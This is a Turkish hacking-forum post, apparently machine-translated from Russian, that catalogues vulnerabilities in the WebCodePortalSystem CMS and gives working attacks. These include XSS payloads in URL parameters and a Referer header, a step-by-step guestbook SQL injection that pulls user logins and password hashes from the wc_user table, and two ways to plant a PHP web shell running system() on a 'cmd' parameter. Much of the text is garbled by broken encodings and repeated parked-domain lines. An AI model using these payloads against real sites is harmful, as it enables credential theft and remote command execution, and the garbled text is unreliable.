Açıkları WebCodePortalSystem:

BEYAGU

Katılımcı Üye
25 Ara 2015
671
0
Kod:
[FONT="League-Gothic"][SIZE="5"][COLOR="Red"]Açıkları WebCodePortalSystem:[/COLOR][/SIZE][/FONT]

WebCodePortalSystem <= 3.7.1 - SQL injection Pasif XSS (c) Dr.Z3r0
WebCodePortalSystem <= 3.8.3.1 - Genel Bilgiler, Aktif XSS, SQL Injection (+ video), kabuk döküm yöntemi (c) GriWebCodePortalSystem <= 4.0.1 - Aktif XSS (c) Gri
WebCodePortalSystem <= 4.0.1 - SQL enjeksiyonu (c) Gri
WebCodePortalSystem <= 4.0.1 - Fludilka çevrimdışı (c) Gri
WebCodePortalSystem <= 4.0.1 - Pasif XSS, SQL enjeksiyonu (c) Dr.Z3r0
WebCodePortalSystem <= 4.0.1 - sployt çalışan SQL enjeksiyonu (c) Dr.Z3r0
WebCodePortalSystem <= 4.1 - SQL injection: "düşürme hakları yönetici" (+ video) (a) Gri
WebCodePortalSystem <= 4.1 - Pasif XSS (c) Dr.Z3r0
WebCodePortalSystem <= 4.1 - Aktif XSS (a) Gri
WebCodePortalSystem <= 4.1 - Yerel dahil açığı, pasiflik XSS (c) Makro
WebCodePortalSystem <= 4.2.1 - Pasif XSS (c) Dr.Z3r0
WebCodePortalSystem <= 4.2.1 - Üzerine Yazma değişkenler (c) Dr.Z3r0
WebCodePortalSystem <= 4.2.1 (4.2.2) - XSS kullanımı hakkında küçük bir yazı: "Bir superuser oluşturuluyor ..." (+ Sniffer + video) (a) Gri
WebCodePortalSystem <= 4.2.1 - Aktif XSS (c) Dr.Z3r0
WebCodePortalSystem <= 4.2.1 (4.2.2) - Pasif XSS (a) Gri
WebCodePortalSystem <= 4.3 - Pasif XSS (a) Makro
WebCodePortalSystem <= 4.3 - SQL yerleştirme (+ sployt) (c) Dr.Z3r0
WebCodePortalSystem <= 4.3 - Pasif XSS (a) Gri
WebCodePortalSystem <= 4.3.1 - Pasif XSS (c) Dr.Z3r0
WebCodePortalSystem <= 4.3.1 - Yerel güvenlik açığı bulunmaktadır (c) Dr.Z3r0
WebCodePortalSystem <= 4.3.1 - Pasif XSS (a) Gri
WebCodePortalSystem <= 4.3.1 - Lёm kabuk ... (a) Gri
WebCodePortalSystem <= 4.4.1 - Uzak include (+ sployt) (c) Dr.Z3r0
WebCodePortalSystem <= 4.4.2 - SQL Injection (a) Dr.Z3r0
WebCodePortalSystem <= 4.4.3 - SQL Injection (a) Dr.Z3r0
WebCodePortalSystem <= 5 - SQL Injection (a) Dr.Z3r0

Güvenlik açıkları ek modüller WebCodePortalSystem:

V2.0 Ses AvtoBloger - Pasif XSS (c) Dr.Z3r0
V1.0 Cates - SQL yerleştirme (+ sployt) (c) Dr.Z3r0
1.1 NewsTematic - Pasif XSS (c) Dr.Z3r0
mod_BigNews1.1 / Mod ve bu sql Enj indir - Pasif XSS / SQL Injection (c) gibson

=============== =============== =============== ===== ==========

WebCodePortalSystem
Ñèñòåìà Óïğàâëåíèÿ Ñàéòîì WebCodePortalSystem bilmiyorum sürümleri sağlar. Benzer şekilde savunmasız sürüm 3.7.1 içinde ve ben böcek bulundu. İşaretli yaklaşık altı ay önce, sadece şimdi ellerini yayınlamak ... ulaştı Mysql-enjeksiyon: Sadece bırak, silme, bir sendikaya, bir karakter, kriter süzülen paket başlıklarında Parametre Kullanıcı aracısı : Mysql-enjeksiyon Parametre xxxxxxxxx_id_wcps Cookie herhangi bir şekilde filtre edilmez. Hassas komut: aut.php XSS:








Kodu:
http://test2.ru/php/wojs.php?tit=xss</title><body onload = javascript: alert ( 'xss')>
http://test2.ru/php/wojs.php?name_titl=xss</title><body onload = javascript: alert ( 'xss')>
Ğ*тот домен припаркован компанией Timeweb ');
Ğ*тот домен припаркован компанией Timeweb ');
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('
Ğ*тот домен припаркован компанией Timeweb '); alert (' xss '); ('

1. 6.10.2007 Son düzenleme: 31.05.2011
Bu 3 polzoveteley onaylar.
Gri
Gri
Banned Üyelik
Kayıt Ol:10.06.2006
Mesajlar:1050
Onaylar:1320
İtibar:713
WebCodePortalSystem <= h. 3.8.3.1

[YASAL UYARI]

Standart önek - WC_
36567.jpg

tipi karma - md5 (şifre)
kullanıcıları ile Tablo - [önek] _User

motoru olan siteleri bulmak için girin: WebCodePortalSystem v.
(Sürüm WebCodePortalSystem v 3.8.3.1 - yazma, yeni anda.)] [1] [Aktif XSS] Filtreleme yok referer, yani bir paketin oluşturulması:








Kodu:
GET /index.php HTTP / 1.1
Host: test2.ru
Yönlendiren http: <IMG SRC javascript =: alert ( 'test');> //
Bağlantı: close
Ayrıca, ne zaman sayfa görüntüleme istatistikleri - Geçişler komut bkz. [2] [SQL enjeksiyonu] Korunmasız ziyaretçi defteri script, script add.php sfoy profiline gitmek "Hesap" alanına "sitenizin URL:" Aşağıdaki girmek ', sürüm () '', '1', '1') # # karakteri yanı sıra / * - satır Sonra ziyaretçi defterine gidin ve bakın: metin ile sahada, Okulumuzun tanıtım "sitenizin URL" it does not matter (ama boş ve küçük pek bırakmayın - - 5-6 standartlarına karakter) mesajları şey girin. veritabanının sürümü görüntülenir, bu durumda bir mesaj ekleyin ve bir metin yerine iletinin bir alt sorgunun sonucunu görmek. Ne yazık ki nedeniyle güzel bir özellik değil ekleme, normal alt sorgu polchuchitsya + başka uzunluğuna sınırlamalar - Eğer tırnak kullanmanız gerekir böylece kümesi alanları dikkate alınmaz: '( "123" select),' ',' 1 ',' 1 ') # - Form 123 elde edilecek . ne yazık ki sorgu uzunluğu sınırı akım küçük, ama etrafında nasıl alabilirim bir yol buldu hiç iyi poetmu vermek Ve böylece, biz alıntı süzülür değil hangi seçeneği vardır, bu "sitenizin URL:" olduğu biz teklifi yerine, bu nedenle, biz isteğimiz değiştirebilirsiniz, ancak bu sorgu yolu şudur:




















PHP:
mysql_query ( "INSERT INTO" . $ wcpref . "defterinle VALUES ( '', ' $ şimdi! Sadece ', ' $ eigbname ', ' $ eigbmail ', ' $ eigburl biz BURAYA hayata', ' $ eigbtext $ attach_text ', '', ' $ eiloggedstatus ', ' $ eigbsname ')
Biz (sitenin adresini ayarladıktan sonra) bu isteği değiştirebilirsiniz tek parametre bir metin mesajlaşma - $ eigbtext $ attach_text, ama o ani tırnak filturuyutsya gibi, ama kullanım tırnak işareti, aşağıdakileri girin gerekli değildir: Sitenizin URL: ' / * Mesajınız: * / version (), null, 3,3) # Ve şimdi sorguda gibi görünecektir:






PHP:
mysql_query ( "INSERT INTO" . $ wcpref . "defterinle VALUES ( '', ' $ şimdi! Sadece ', ' $ eigbname ', ' $ eigbmail ', '', / * ',' * / version (), null, 3, 3)
bize ',' zakamentirovanno olacak önler (tam # sonuçta böyle). Ve sorun da boşluk ile çözülmüştür arada - büyük ölçüde alt sorgu yapımını basitleştiren. Ve bu yüzden, örneğin, giriş sonucunu sql enjeksiyon tanıtmak ve kullanıcının parolasını karma fırsatı polchaem (ancak bir virgül kullanamazsınız, çünkü iki ayrı sorgu yapmak zorunda): Metni Mesajlar: null, 3,3) # * / (burada fıkra id = 2 seçin USER_LOGIN wc_user) Mesajınız: * from / (select user_pass wc_user nerede fıkra id = 2), null, 3,3) # Siteniz için URL (içinde Her iki olgu): '/ * !!!! Eğer sitenin URL'sini girmeyin Kayıt olduğunuzda: '/ * - alıntı kaçtı profilinizdeki verileri düzenlerken yalnızca, girilen !!!!!!! !!!! online regilis ve Profil sahibi Reg olmadan sitede ziyaretçi defterine mesaj yazarken bu seçeneği değiştirdiyseniz Uyazvimsot geçerlidir - alıntı kaçtı !!!!!!! [admin] [Bilgilendirme mutlak yolu] Normal setinde (örneğin WebCodePortalSystem versiyonu v. 3.8.3.1) yüklü modülün parçası değil, "PHP bilgisi" Install bilgi PHP "INSTALL", ve sonra yeni bir seçenek "bilgi PHP" var [kabuğu doldurun] 1. . Sql sorgu ile örnek dosya 1.SQL için, isteği ile bir dosya oluşturmak için: ÇıkışDosyası 'mutlak yol / shell.php' içine seçin 'kabuk kodu'; Biz bir kabuk olsun: http://site.ru/shell.php 2. Etiketleri düzenledikten sonra örnek METKA_STATUS etiketi için "Etiketler", aşağıdaki kodu ekleyin:




























SİSTEMİ KANDIRMA <ZONE HEAD ZONE <--/*/< ASP







PHP:
kod_shella = $ ' <? php sistemi ( $ HTTP_GET_VARS [ "cmd" ]); ?> ';
$ file_shell = fopen ( "w" "shell.php");
fputs ($ file_shell, $ kod_shella);
fclose ($ file_shell);
Get kabuk :
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.